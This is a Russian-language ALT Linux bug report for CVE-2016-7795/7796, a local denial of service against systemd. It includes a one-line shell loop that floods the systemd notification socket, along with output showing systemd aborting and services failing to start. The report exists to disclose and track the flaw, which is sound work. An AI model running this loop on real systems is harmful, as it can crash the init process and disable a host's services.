Summary: | CVE-2016-7795, CVE-2016-7796: systemd: local denial-of-service attack via notification socket | ||
---|---|---|---|
Product: | ALT Linux Centaurus | Reporter: | Mikhail Kasimov <mikhail.kasimov> |
Component: | Ошибки работы | Assignee: | Anton V. Boyarshinov <boyarsh> |
Status: | NEW --- | QA Contact: | qa-p7 <qa-p7> |
Severity: | normal | ||
Priority: | P3 | CC: | evg, mike, sotor |
Version: | не указана | ||
Hardware: | all | ||
OS: | Linux |
Description
Mikhail Kasimov
2016-09-29 18:50:43 MSK
Присвоенные CVE: CVE-2016-7795, CVE-2016-7796 Источник: http://seclists.org/oss-sec/2016/q3/675 На виртуальной машине следующие результаты: От root: $ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done >systemdlog Broadcast message from systemd-journald@host-15.localdomain (Fri 2016-09-30 14:36:54 MSK): systemd[1]: Caught <ABRT>, dumped core as pid 1594. Broadcast message from systemd-journald@host-15.localdomain (Fri 2016-09-30 14:36:54 MSK): systemd[1]: Freezing execution. Failed to notify init system: Connection refused Failed to notify init system: Connection refused Failed to notify init system: Connection refused Перестают запускаться сервисы: $ service sshd start Failed to start sshd.service: Failed to activate service 'org.freedesktop.systemd1': timed out See system logs and 'systemctl status sshd.service' for details. От обычного пользователя: $ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done >systemdlog bash: systemdlog: Отказано в доступе Версия systemctl: $ systemctl --version systemd 230 +PAM +AUDIT +SELINUX -IMA -APPARMOR -SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN Версия ALT Linux: $ uname -a Linux host-15.localdomain 4.4.16-std-def-alt0.M80P.1 #1 SMP Thu Jul 28 03:44:48 UTC 2016 x86_64 GNU/Linux |